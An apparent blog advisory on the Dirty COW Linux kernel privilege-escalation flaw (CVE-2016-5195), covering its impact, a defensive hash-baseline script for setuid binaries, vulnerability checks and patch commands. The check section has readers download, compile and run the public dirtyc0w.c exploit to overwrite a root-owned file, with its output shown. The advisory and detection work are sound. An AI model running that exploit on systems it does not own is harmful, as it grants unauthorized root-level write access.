Dirty COW (CVE-2016-5195): a 0-day local privilege escalation vulnerability in the Linux kernel…

Any user can become root in less than 5 seconds!


The bug has existed since Linux kernel version 2.6.22 and was found by Phil Oester.

Exploitation of this bug leaves no trace of anything abnormal in the logs, so you cannot detect whether someone has exploited it against your server.

From the official page:

A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.

Impact

  • An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
  • This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.
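The post points out that exploitation leaves nothing in the logs; the check a defender can still run is an integrity comparison of the files the flaw is able to rewrite, namely root-owned binaries that an unprivileged user can only read. The script below is an added example, not code from the original post or from the Dirty COW project: it records SHA-256 hashes of a file tree (or of every setuid-root binary on the local filesystems), and later reports any file that changed or disappeared. The function names and the baseline-file format are this example's own choices.

```shell
#!/bin/sh
# Added example (not part of the original post): file-integrity baseline for
# the on-disk binaries that Dirty COW could modify. Because exploitation is
# silent in the logs, the after-the-fact evidence is a read-only, root-owned
# file whose hash no longer matches a baseline taken while the system was
# known-good. Record the baseline, keep it off the box, and re-check it after
# the kernel update (and periodically).

# hash_tree DIR  -> print "<sha256>  <path>" for every regular file under DIR
hash_tree() {
    find "$1" -xdev -type f -exec sha256sum {} + | LC_ALL=C sort -k2
}

# setuid_baseline -> hash every setuid-root binary on the local filesystems,
# i.e. the files the advisory says an unprivileged user could modify.
# Run it while the system is believed clean and redirect the output to a file.
setuid_baseline() {
    find / -xdev -type f -perm -4000 -user root -exec sha256sum {} + 2>/dev/null \
        | LC_ALL=C sort -k2
}

# verify_baseline BASELINE_FILE -> prints "CHANGED  <path>" or "MISSING  <path>"
# for every entry that no longer matches; returns 1 if anything differs, else 0.
verify_baseline() {
    status=0
    while read -r expected path; do
        if [ ! -f "$path" ]; then
            echo "MISSING  $path"
            status=1
            continue
        fi
        actual=$(sha256sum "$path" | cut -d' ' -f1)
        if [ "$actual" != "$expected" ]; then
            echo "CHANGED  $path"
            status=1
        fi
    done < "$1"
    return $status
}

# Typical use (commented out so the functions can be sourced without side effects):
#   setuid_baseline > /root/setuid.sha256     # while the host is known-good
#   verify_baseline /root/setuid.sha256       # later; non-zero exit means a hit
```

A hit from `verify_baseline` after a legitimate package upgrade is expected, so refresh the baseline right after patching; a hit with no corresponding package change on a host that was running a vulnerable kernel is what warrants an investigation.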

How to determine if your system is vulnerable

For RHEL/CentOS Linux, use the following script:

$ wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_1.sh
$ bash rh-cve-2016-5195_1.sh

For all other distros, you can try the PoC, which rewrites a file owned by root:

$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

Run it first as root:

$ sudo -s
# echo this is not a test > foo

Then run this as normal user:

$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000

How to fix?

Simply update your Linux distribution! 🙂

Red Hat/CentOS/Fedora

$ sudo yum update
$ sudo reboot

Debian/Mint/Ubuntu

sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade
sudo reboot

Links and references

http://dirtycow.ninja/
